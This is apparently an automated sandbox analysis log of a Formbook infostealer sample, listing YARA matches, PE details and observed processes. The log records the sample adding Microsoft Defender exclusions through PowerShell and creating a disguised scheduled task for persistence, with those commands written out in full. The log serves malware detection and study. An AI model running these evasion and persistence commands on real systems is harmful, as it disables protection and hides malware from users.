Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: qxnptkmQbHB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@16/19@9/4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4756:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D41.tmpJump to behavior
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: HAWB AND INV.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\HAWB AND INV.exe
          Source: unknownProcess created: C:\Users\user\Desktop\HAWB AND INV.exe 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: HAWB AND INV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HAWB AND INV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_009794E5 push cs; iretd
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05838AB8 pushad ; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05838AC2 pushad ; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B584 push edi; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415611 pushfd ; iretd
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415EB3 push edx; retf
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415FB3 push esi; ret
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_007594E5 push cs; iretd
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0122D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B402 push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B40B push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B46C push eax; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B584 push edi; ret
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125611 pushfd ; iretd
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125EB3 push edx; retf
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125FB3 push esi; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93407065965

          Persistence and Installation Behavior:

          Uses ipconfig to lookup or modify the Windows network settings
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe

          Boot Survival:

          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
